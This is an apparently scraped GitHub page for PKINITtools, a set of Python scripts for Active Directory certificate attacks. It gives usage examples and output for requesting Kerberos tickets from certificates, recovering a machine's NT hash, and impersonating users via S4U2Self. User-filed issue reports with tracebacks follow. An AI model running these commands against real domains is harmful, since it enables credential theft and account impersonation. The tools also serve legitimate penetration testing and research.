This repository contains some utilities for playing with PKINIT and certificates.

Overview

PKINIT tools

This repository contains some utilities for playing with PKINIT and certificates.
The tools are built on minikerberos and impacket. Accompanying blogpost with more context: https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/

Installation

These tools are only compatible with Python 3.5+. Clone the repository from GitHub, install the dependencies and you should be good to go:

git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos

Using a virtualenv for this is recommended.

Tools

gettgtpkinit.py

Request a TGT using a PFX file, either as file or as base64 encoded blob, or PEM files for cert+key. This uses Kerberos PKINIT and will output a TGT into the specified ccache. It will also print the AS-REP encryption key which you may need for the getnthash.py tool. Usage example:

(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py -h
usage: gettgtpkinit.py [-h] [-cert-pfx file] [-pfx-pass password] [-pfx-base64 BASE64] [-cert-pem file] [-key-pem file] [-dc-ip DC_IP] [-v]
                       domain/username ccache

Requests a TGT using Kerberos PKINIT and either a PEM or PFX based certificate+key

positional arguments:
  domain/username     Domain and username in the cert
  ccache              ccache file to store the TGT in

optional arguments:
  -h, --help          show this help message and exit
  -cert-pfx file      PFX file
  -pfx-pass password  PFX file password
  -pfx-base64 BASE64  PFX file as base64 string
  -cert-pem file      Certificate in PEM format
  -key-pem file       Private key file in PEM format
  -dc-ip DC_IP        DC IP or hostname to use as KDC
  -v, --verbose

(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py testsegment.local/s2019dc\$ -cert-pfx ~/impacket-py3/cert.pfx -pfx-pass hoi s2019dc.ccache
2021-07-27 21:25:24,299 minikerberos INFO     Loading certificate and key from file
2021-07-27 21:25:24,316 minikerberos INFO     Requesting TGT
2021-07-27 21:25:24,333 minikerberos INFO     AS-REP encryption key (you might need this later):
2021-07-27 21:25:24,333 minikerberos INFO     5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
2021-07-27 21:25:24,336 minikerberos INFO     Saved TGT to file

getnthash.py

Use Kerberos U2U to submit a TGS request for yourself. This will include with the PAC which in turn contains the NT hash that you can decrypt with the AS-REP key that was used for your specific TGT. It's magic really. This tool requires a TGT resulting from PKINIT to be in your KRB5CCNAME env variable. Usage:

(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py -h
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: getnthash.py [-h] -key KEY [-dc-ip ip address] [-debug] identity

positional arguments:
  identity           domain/username

optional arguments:
  -h, --help         show this help message and exit
  -key KEY           AS REP key from gettgtpkinit.py
  -dc-ip ip address  IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -debug             Turn DEBUG output ON

(PKINITtools) user@localhost:~/PKINITtools$ export KRB5CCNAME=s2019dc.ccache
(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py testsegment.local/s2019dc\$ -key 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
fa6b130d73311d1be5495f589f9f4571

gets4uticket.py

Uses Kerberos S4U2Self to request a service ticket that is valid on the host for which you've obtained a certificate. This ticket can then be used to interact with the original host. This only requires a TGT for the machine account of this host. This TGT should be in a ccache file that you specify in the kerberos_connection_url. The only accepted kerberos_connection_url for this example is one containing a ccache file, so for example kerberos+ccache://domain.local\\victimhostname\$:[email protected]. The SPN should be a service name on the host you are impersonating, you can't use this for delegation attacks (since it does not implement S4U2Proxy, there are plenty of tools already for that). Usage:

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py -h
usage: gets4uticket.py [-h] [-v] kerberos_connection_url spn targetuser ccache

Gets an S4U2self ticket impersonating given user

positional arguments:
  kerberos_connection_url
                        the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@
  spn                   the service principal in format /@ Example: cifs/[email protected] for a
                        TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
  targetuser
  ccache                ccache file to store the TGT ticket in

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO     Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO     Success!
2021-07-28 10:09:13,696 minikerberos INFO     Done!

License

MIT

Credits

Comments
  • Error Code: 62 Reason: The client trust failed or is not implemented

    Error Code: 62 Reason: The client trust failed or is not implemented

    Hello, get this error when trying to get tgt with gettgtpkinit.py (it's ok with rubeus):

    python3 gettgtpkinit.py EVIL/DC1-WS2019$ -pfx-base64 @base64Value -dc-ip 192.168.114.2 DC-WS2019.ccache

    2021-11-28 04:54:42,236 minikerberos INFO Loading certificate and key from file 2021-11-28 04:54:42,314 minikerberos INFO Requesting TGT Traceback (most recent call last): File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 349, in main() File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 345, in main amain(args) File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 315, in amain res = sock.sendrecv(req) File "/home/kali/Take and learn/MSEFSR ADCS/impacket/impacket/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv raise KerberosError(krb_message) minikerberos.protocol.errors.KerberosError: Error Code: 62 Reason: The client trust failed or is not implemented

    opened by ivanov21 3
  • Fixed kdcHost set to None

    Fixed kdcHost set to None

    When requesting for the ticket, the sendReceive() function was called with the kdcHost argument set to None, preventing the script to work when not having DNS resolution set properly on the host.

    python3 getnthash.py -key "2ddb [...] 9969" -dc-ip "192.168.56.101" "domain.local/user2"
    Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation
    
    [*] Using TGT from cache
    [*] Requesting ticket to self with PAC
    [-] [Errno Connection error (DOMAIN.LOCAL:88)] [Errno -2] Name or service not known
    
    opened by ShutdownRepo 1
  • Missing minikerberos.pkinit

    Missing minikerberos.pkinit

    Python version: Python 3.9 OS: Kali Linux 2021.XX PKINIT Status: Worked with Rubeus

    I encountered the error from minikerberos.pkinit import PKINIT missing. I had installed oscrypto and minikerberos and also did python -m pip install -r requirements.txt to no avail. I tried sudo and no sudo adaptions also to no avail. In the end, I found that uninstalling minikerberos and installing from their GitHub repository succeeded.

    Adding this issue to note the workaround for future reference and closing due to likely pip being out-of-date.

    opened by Zamanry 0
  • AttributeError: 'str' object has no attribute 'value'

    AttributeError: 'str' object has no attribute 'value'

    Hi,

    Thank you for your effort developing this tool. I am trying to use the tool to request a TGT but it currently fails. See below for the command I used and the related error.

    ──(shadow)─(root💀kali)-[/home/kali/pentest/PKINITtools-master] └─# python3 gettgtpkinit.py adlab.local/user_t_1_admins user_t_1_admins.ccache -cert-pfx /home/kali/pentest/pywhisker-main/hHKEiIIf.pfx -pfx-pass OhEKkA1wkW7FC1xUX337 2021-09-13 19:40:13,894 minikerberos INFO Loading certificate and key from file 2021-09-13 19:40:13,919 minikerberos INFO Requesting TGT Traceback (most recent call last): File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 349, in main() File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 345, in main amain(args) File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 315, in amain res = sock.sendrecv(req) File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv raise KerberosError(krb_message) File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/protocol/errors.py", line 20, in init super(Exception, self).init('%s Error Code: %d Reason: %s ' % (extra_msg, self.errorcode.value, self.errormsg.value)) AttributeError: 'str' object has no attribute 'value'

    opened by jsdhasfeds 5
  • KDC has no support for PADATA type (pre-authentication data)

    KDC has no support for PADATA type (pre-authentication data)

    when I gettgt from a certificate ,I get error show below: python3 gettgtpkinit.py -cert-pfx ../temp/PetitPotam/host1.pfx -dc-ip 10.0.0.0.1 domain/test$ test.ccache -v 1 ⨯ 2021-07-30 04:59:22,388 minikerberos INFO Loading certificate and key from file 2021-07-30 04:59:22,507 minikerberos INFO Requesting TGT Traceback (most recent call last): File "/home/kali/PKINITtools/gettgtpkinit.py", line 349, in main() File "/home/kali/PKINITtools/gettgtpkinit.py", line 345, in main amain(args) File "/home/kali/PKINITtools/gettgtpkinit.py", line 315, in amain res = sock.sendrecv(req) File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.14-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv minikerberos.protocol.errors.KerberosError: Error Code: 16 Reason: KDC has no support for PADATA type (pre-authentication data)

    opened by sharp-shooter 4
Owner
Dirk-jan
Dirk-jan
Playing with python imports and inducing those pesky errors.

super-duper-python-imports In this repository we are playing with python imports and inducing those pesky ImportErrors. File Organization project │

James Kelsey 2 Oct 14, 2021
A Python package implementing various colour checker detection algorithms and related utilities.

A Python package implementing various colour checker detection algorithms and related utilities.

colour-science 147 Dec 29, 2022
Plone Interface contracts, plus basic features and utilities

plone.base This package is the base package of the CMS Plone <https://plone.org>. It contains only interface contracts and basic features and utilitie

Plone Foundation 1 Oct 3, 2022
Set of utilities for exporting/controlling your robot in Blender

Blender Robotics Utils This repository contains utilities for exporting/controlling your robot in Blender Maintainers This repository is maintained by

Robotology 33 Nov 30, 2022
Python utilities for writing cross-version compatible libraries

Python utilities for writing cross-version compatible libraries

Tyler M. Kontra 85 Jun 29, 2022
Michael Vinyard's utilities

Install vintools To download this package from pypi: pip install vintools Install the development package To download and install the developmen

Michael Vinyard 2 May 22, 2022
Data Utilities e.g. for importing files to onetask

Use this repository to easily convert your source files (csv, txt, excel, json, html) into record-oriented JSON files that can be uploaded into onetask.

onetask.ai 1 Jul 18, 2022
PyResToolbox - A collection of Reservoir Engineering Utilities

pyrestoolbox A collection of Reservoir Engineering Utilities This set of functio

Mark W. Burgoyne 39 Oct 17, 2022
A work in progress box containing various Python utilities

python-wipbox A set of modern Python libraries under development to simplify the execution of reusable routines by different projects. Table of Conten

Deepnox 2 Jan 20, 2022
Python based utilities for interacting with digital multimeters that are built on the FS9721-LP3 chipset.

Python based utilities for interacting with digital multimeters that are built on the FS9721-LP3 chipset.

Fergus 1 Feb 2, 2022
ZX Spectrum Utilities: (zx-spectrum-utils)

Here are a few utility programs that can be used with the zx spectrum. The ZX Spectrum is one of the first home computers from the early 1980s.

Graham Oakes 4 Mar 7, 2022
This repository contains scripts that help you validate QR codes.

Validation tools This repository contains scripts that help you validate QR codes. It's hacky, and a warning for Apple Silicon users: the dependencies

Ryan Barrett 8 Mar 1, 2022
SysInfo is an app developed in python which gives Basic System Info , and some detailed graphs of system performance .

SysInfo SysInfo is an app developed in python which gives Basic System Info , and some detailed graphs of system performance . Installation Download t

null 5 Nov 8, 2021
This tool lets you perform some quick tasks for CTFs and Pentesting.

This tool lets you convert strings and numbers between number bases (2, 8, 10 and 16) as well as ASCII text. You can use the IP address analyzer to find out details on IPv4 and perform abbreviation as well as expansion on IPv6 addresses.It can also perform a two's complement calculation as well.

Ayomide Ayodele-Soyebo 1 Jul 16, 2022
Make some improvements in the Pizza class and pizzashop file by refactoring.

Make some improvements in the Pizza class and pizzashop file by refactoring.

James Brucker 1 Oct 18, 2021
Small Python script to parse endlessh's output and print some neat statistics

endlessh_parser endlessh_parser is a small Python script that parses endlessh's output and prints some neat statistics about it Usage Install all the

ManicRobot 1 Oct 18, 2021
Just some scripts to export vector tiles to geojson.

Vector tiles to GeoJSON Nowadays modern web maps are usually based on vector tiles. The great thing about vector tiles is, that they are not just imag

Lilith Wittmann 77 Jul 26, 2022
Set of scripts for some automation during Magic Lantern development

~kitor Magic Lantern scripts A few automation scripts I wrote to automate some things in my ML development efforts. Used only on Debian running over W

Kajetan Krykwiński 1 Jan 3, 2022
Python script to get some stats on nodes in a Blender material nodetree

Python script to get some stats on nodes in a Blender material nodetree. It counts the nodes, the node types and the max deep level for group nodes.

Alek Mugnozzo 2 Sep 3, 2022